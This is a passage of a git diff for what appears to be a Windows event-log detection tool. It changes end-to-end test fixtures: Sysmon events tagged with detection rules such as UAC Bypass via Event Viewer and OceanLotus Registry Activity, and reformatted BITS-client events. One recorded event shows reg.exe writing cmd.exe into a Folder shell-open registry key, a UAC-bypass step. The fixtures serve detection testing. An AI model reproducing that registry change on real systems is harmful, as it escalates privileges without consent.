10:08:37.392","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TM.blf","UtcTime":"2020-08-25 10:08:37.392"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359032,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.401236Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.392","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000001.regtrans-ms","UtcTime":"2020-08-25 
10:08:37.392"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359033,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.401303Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.392","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000002.regtrans-ms","UtcTime":"2020-08-25 10:08:37.392"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359036,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.418961Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - 
File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.579","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man{f9a54a1c-9fa5-11ea-ac3f-00155d0a720b}.TxR.blf","UtcTime":"2020-08-25 10:08:37.579"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359040,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.594123Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.595","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man{f9a54a1c-9fa5-11ea-ac3f-00155d0a720b}.TxR.0.regtrans-ms","UtcTime":"2020-08-25 
10:08:37.595"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359041,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.610172Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.392","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\ntuser.man","UtcTime":"2020-08-25 10:08:37.673"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359044,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.677776Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 
10:08:37.673","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\AppData\\Local\\Microsoft\\CLR_v4.0","UtcTime":"2020-08-25 10:08:37.673"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359046,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.678592Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.673","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs","UtcTime":"2020-08-25 10:08:37.673"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359047,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.678627Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC 
Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:37.673","Image":"C:\\Users\\user01\\Desktop\\Debug\\TransactionLog.exe","ProcessGuid":"747F3D96-E324-5F44-0000-0010AA0D4100","ProcessId":520,"RuleName":"","TargetFilename":"C:\\Users\\user01\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\TransactionLog.exe.log","UtcTime":"2020-08-25 10:08:37.673"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":359048,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:37.678671Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"(Empty)","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-A104-5D46-0000-0010C79CBC03","ProcessId":7312,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\Folder\\shell\\open\\command\\DelegateExecute","UtcTime":"2019-08-04 
09:10:28.869"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5696,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-08-04T09:10:28.893194Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-A104-5D46-0000-001092A6BC03","ProcessId":2576,"RuleName":"PrivEsc - UAC bypass UACME-53","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\Folder\\shell\\open\\command\\(Default)","UtcTime":"2019-08-04 09:10:29.025"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5698,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-08-04T09:10:29.060588Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Sdclt Child Processes"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\control.exe\" /name Microsoft.BackupAndRestoreCenter","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Control Panel","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=391FF1F690C0912C217B3CF625900D4F50128867,MD5=88EA810385F455C74306D71C4879C61C,SHA256=4774A931C9D97828323C9E829917D82C27A05DAB9FEA6A0CEF9EBBA59942231F,IMPHASH=7A8EC2645C24D85DE8216D63022623C0","Image":"C:\\Windows\\System32\\control.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-56A3-5D45-0000-0020B3D31800","LogonId":"0x18d3b3","ParentCommandLine":"\"C:\\Windows\\system32\\sdclt.exe\" ","ParentImage":"C:\\Windows\\System32\\sdclt.exe","ParentProcessGuid":"747F3D96-A105-5D46-0000-00103BEBBC03","ParentProcessId":4532,"ProcessGuid":"747F3D96-A106-5D46-0000-00107201BD03","ProcessId":1380,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-04 09:10:30.346"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":5702,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-08-04T09:10:30.752830Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}}] \ No newline at end of file diff --git a/e2e/search_expected.yml b/e2e/search_expected.yml index 78bf465..3c01842 100644 --- a/e2e/search_expected.yml +++ b/e2e/search_expected.yml @@ -1,7 +1,5 @@ --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Id: 400B6CF7-D355-4E0C-B9AE-4E8D8C8FF6A0 bytesTotal: 1317080 
@@ -16,35 +14,30 @@ Event: System: Channel: Microsoft-Windows-Bits-Client/Operational Computer: MSEDGEWIN10 - Correlation: - "#attributes": - ActivityID: 3A7966F4-C627-4D9A-9BE6-0647DD61DB3A + Correlation_attributes: + ActivityID: 3A7966F4-C627-4D9A-9BE6-0647DD61DB3A EventID: 59 EventRecordID: 8199 - Execution: - "#attributes": - ProcessID: 4964 - ThreadID: 2612 + Execution_attributes: + ProcessID: 4964 + ThreadID: 2612 Keywords: "0x4000000000000000" Level: 4 Opcode: 1 - Provider: - "#attributes": - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E + Name: Microsoft-Windows-Bits-Client + Security_attributes: + UserID: S-1-5-18 Task: 0 - TimeCreated: - "#attributes": - SystemTime: "2020-10-17T11:50:02.661365Z" + TimeCreated_attributes: + SystemTime: "2020-10-17T11:50:02.661365Z" Version: 1 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: AdditionalInfoHr: 0 Id: 400B6CF7-D355-4E0C-B9AE-4E8D8C8FF6A0 
@@ -66,35 +59,30 @@ Event: System: Channel: Microsoft-Windows-Bits-Client/Operational Computer: MSEDGEWIN10 - Correlation: - "#attributes": - ActivityID: 3A7966F4-C627-4D9A-9BE6-0647DD61DB3A + Correlation_attributes: + ActivityID: 3A7966F4-C627-4D9A-9BE6-0647DD61DB3A EventID: 60 EventRecordID: 8200 - Execution: - "#attributes": - ProcessID: 4964 - ThreadID: 368 + Execution_attributes: + ProcessID: 4964 + ThreadID: 368 Keywords: "0x4000000000000000" Level: 4 Opcode: 2 - Provider: - "#attributes": - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E + Name: Microsoft-Windows-Bits-Client + Security_attributes: + UserID: S-1-5-18 Task: 0 - TimeCreated: - "#attributes": - SystemTime: "2020-10-17T11:50:15.796214Z" + TimeCreated_attributes: + SystemTime: "2020-10-17T11:50:15.796214Z" Version: 1 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Id: A5842CB6-8F50-4944-8AF7-2C088B21DDC3 bytesTotal: 25802496 
@@ -109,35 +97,30 @@ Event: System: Channel: Microsoft-Windows-Bits-Client/Operational Computer: MSEDGEWIN10 - Correlation: - "#attributes": - ActivityID: 9EE2B7A4-77CE-4CFC-BB31-6EBCFAE55322 + Correlation_attributes: + ActivityID: 9EE2B7A4-77CE-4CFC-BB31-6EBCFAE55322 EventID: 59 EventRecordID: 8206 - Execution: - "#attributes": - ProcessID: 4028 - ThreadID: 908 + Execution_attributes: + ProcessID: 4028 + ThreadID: 908 Keywords: "0x4000000000000000" Level: 4 Opcode: 1 - Provider: - "#attributes": - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E + Name: Microsoft-Windows-Bits-Client + Security_attributes: + UserID: S-1-5-18 Task: 0 - TimeCreated: - "#attributes": - SystemTime: "2020-10-17T12:32:08.987914Z" + TimeCreated_attributes: + SystemTime: "2020-10-17T12:32:08.987914Z" Version: 1 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: AdditionalInfoHr: 0 Id: A5842CB6-8F50-4944-8AF7-2C088B21DDC3 
@@ -159,35 +142,30 @@ Event: System: Channel: Microsoft-Windows-Bits-Client/Operational Computer: MSEDGEWIN10 - Correlation: - "#attributes": - ActivityID: 9EE2B7A4-77CE-4CFC-BB31-6EBCFAE55322 + Correlation_attributes: + ActivityID: 9EE2B7A4-77CE-4CFC-BB31-6EBCFAE55322 EventID: 60 EventRecordID: 8222 - Execution: - "#attributes": - ProcessID: 4028 - ThreadID: 6308 + Execution_attributes: + ProcessID: 4028 + ThreadID: 6308 Keywords: "0x4000000000000000" Level: 4 Opcode: 2 - Provider: - "#attributes": - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E + Name: Microsoft-Windows-Bits-Client + Security_attributes: + UserID: S-1-5-18 Task: 0 - TimeCreated: - "#attributes": - SystemTime: "2020-10-17T12:36:06.775288Z" + TimeCreated_attributes: + SystemTime: "2020-10-17T12:36:06.775288Z" Version: 1 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Id: 20160230-2E6F-428A-A61F-20740628577B bytesTotal: 2014464 
@@ -202,35 +180,30 @@ Event: System: Channel: Microsoft-Windows-Bits-Client/Operational Computer: MSEDGEWIN10 - Correlation: - "#attributes": - ActivityID: 9B0E2C03-84A2-4A7E-8F99-0316872BA7BE + Correlation_attributes: + ActivityID: 9B0E2C03-84A2-4A7E-8F99-0316872BA7BE EventID: 59 EventRecordID: 8448 - Execution: - "#attributes": - ProcessID: 2788 - ThreadID: 948 + Execution_attributes: + ProcessID: 2788 + ThreadID: 948 Keywords: "0x4000000000000000" Level: 4 Opcode: 1 - Provider: - "#attributes": - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E + Name: Microsoft-Windows-Bits-Client + Security_attributes: + UserID: S-1-5-18 Task: 0 - TimeCreated: - "#attributes": - SystemTime: "2020-10-23T21:55:59.769081Z" + TimeCreated_attributes: + SystemTime: "2020-10-23T21:55:59.769081Z" Version: 1 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: AdditionalInfoHr: 0 Id: 20160230-2E6F-428A-A61F-20740628577B 
@@ -252,35 +225,30 @@ Event: System: Channel: Microsoft-Windows-Bits-Client/Operational Computer: MSEDGEWIN10 - Correlation: - "#attributes": - ActivityID: 9B0E2C03-84A2-4A7E-8F99-0316872BA7BE + Correlation_attributes: + ActivityID: 9B0E2C03-84A2-4A7E-8F99-0316872BA7BE EventID: 60 EventRecordID: 8449 - Execution: - "#attributes": - ProcessID: 2788 - ThreadID: 9108 + Execution_attributes: + ProcessID: 2788 + ThreadID: 9108 Keywords: "0x4000000000000000" Level: 4 Opcode: 2 - Provider: - "#attributes": - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E + Name: Microsoft-Windows-Bits-Client + Security_attributes: + UserID: S-1-5-18 Task: 0 - TimeCreated: - "#attributes": - SystemTime: "2020-10-23T21:56:21.668986Z" + TimeCreated_attributes: + SystemTime: "2020-10-23T21:56:21.668986Z" Version: 1 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Id: DE4AC99A-C567-4CAA-9703-3FFEE775C75D bytesTotal: 1708800 
@@ -295,35 +263,30 @@ Event: System: Channel: Microsoft-Windows-Bits-Client/Operational Computer: MSEDGEWIN10 - Correlation: - "#attributes": - ActivityID: 30A3A3D8-9715-42EE-A715-CBA39B04E3A4 + Correlation_attributes: + ActivityID: 30A3A3D8-9715-42EE-A715-CBA39B04E3A4 EventID: 59 EventRecordID: 8530 - Execution: - "#attributes": - ProcessID: 7344 - ThreadID: 3400 + Execution_attributes: + ProcessID: 7344 + ThreadID: 3400 Keywords: "0x4000000000000000" Level: 4 Opcode: 1 - Provider: - "#attributes": - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E + Name: Microsoft-Windows-Bits-Client + Security_attributes: + UserID: S-1-5-18 Task: 0 - TimeCreated: - "#attributes": - SystemTime: "2020-11-05T10:55:56.114648Z" + TimeCreated_attributes: + SystemTime: "2020-11-05T10:55:56.114648Z" Version: 1 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: AdditionalInfoHr: 0 Id: DE4AC99A-C567-4CAA-9703-3FFEE775C75D 
@@ -345,35 +308,30 @@ Event: System: Channel: Microsoft-Windows-Bits-Client/Operational Computer: MSEDGEWIN10 - Correlation: - "#attributes": - ActivityID: 30A3A3D8-9715-42EE-A715-CBA39B04E3A4 + Correlation_attributes: + ActivityID: 30A3A3D8-9715-42EE-A715-CBA39B04E3A4 EventID: 60 EventRecordID: 8531 - Execution: - "#attributes": - ProcessID: 7344 - ThreadID: 9012 + Execution_attributes: + ProcessID: 7344 + ThreadID: 9012 Keywords: "0x4000000000000000" Level: 4 Opcode: 2 - Provider: - "#attributes": - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E + Name: Microsoft-Windows-Bits-Client + Security_attributes: + UserID: S-1-5-18 Task: 0 - TimeCreated: - "#attributes": - SystemTime: "2020-11-05T10:56:12.615763Z" + TimeCreated_attributes: + SystemTime: "2020-11-05T10:56:12.615763Z" Version: 1 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Id: FF56F08A-3D87-4A27-9E54-1444A29F0449 bytesTotal: 2603264 
@@ -388,35 +346,30 @@ Event: System: Channel: Microsoft-Windows-Bits-Client/Operational Computer: MSEDGEWIN10 - Correlation: - "#attributes": - ActivityID: 7E43CA01-DD5D-4814-8A56-15F509508F44 + Correlation_attributes: + ActivityID: 7E43CA01-DD5D-4814-8A56-15F509508F44 EventID: 59 EventRecordID: 8833 - Execution: - "#attributes": - ProcessID: 4908 - ThreadID: 4660 + Execution_attributes: + ProcessID: 4908 + ThreadID: 4660 Keywords: "0x4000000000000000" Level: 4 Opcode: 1 - Provider: - "#attributes": - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E + Name: Microsoft-Windows-Bits-Client + Security_attributes: + UserID: S-1-5-18 Task: 0 - TimeCreated: - "#attributes": - SystemTime: "2020-11-12T10:56:13.148615Z" + TimeCreated_attributes: + SystemTime: "2020-11-12T10:56:13.148615Z" Version: 1 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: AdditionalInfoHr: 0 Id: FF56F08A-3D87-4A27-9E54-1444A29F0449 
@@ -438,35 +391,30 @@ Event: System: Channel: Microsoft-Windows-Bits-Client/Operational Computer: MSEDGEWIN10 - Correlation: - "#attributes": - ActivityID: 7E43CA01-DD5D-4814-8A56-15F509508F44 + Correlation_attributes: + ActivityID: 7E43CA01-DD5D-4814-8A56-15F509508F44 EventID: 60 EventRecordID: 8834 - Execution: - "#attributes": - ProcessID: 4908 - ThreadID: 5396 + Execution_attributes: + ProcessID: 4908 + ThreadID: 5396 Keywords: "0x4000000000000000" Level: 4 Opcode: 2 - Provider: - "#attributes": - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E + Name: Microsoft-Windows-Bits-Client + Security_attributes: + UserID: S-1-5-18 Task: 0 - TimeCreated: - "#attributes": - SystemTime: "2020-11-12T10:57:10.415576Z" + TimeCreated_attributes: + SystemTime: "2020-11-12T10:57:10.415576Z" Version: 1 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Id: 6BFD2AD8-963A-4E3D-A596-DDB00305910F bytesTotal: 22209280 
@@ -481,35 +429,30 @@ Event: System: Channel: Microsoft-Windows-Bits-Client/Operational Computer: MSEDGEWIN10 - Correlation: - "#attributes": - ActivityID: 3FBCCCA9-5F54-4F3C-A2DE-A805CAC185BD + Correlation_attributes: + ActivityID: 3FBCCCA9-5F54-4F3C-A2DE-A805CAC185BD EventID: 59 EventRecordID: 8971 - Execution: - "#attributes": - ProcessID: 8076 - ThreadID: 368 + Execution_attributes: + ProcessID: 8076 + ThreadID: 368 Keywords: "0x4000000000000000" Level: 4 Opcode: 1 - Provider: - "#attributes": - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E + Name: Microsoft-Windows-Bits-Client + Security_attributes: + UserID: S-1-5-18 Task: 0 - TimeCreated: - "#attributes": - SystemTime: "2020-11-18T21:49:57.232015Z" + TimeCreated_attributes: + SystemTime: "2020-11-18T21:49:57.232015Z" Version: 1 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: AdditionalInfoHr: 0 Id: 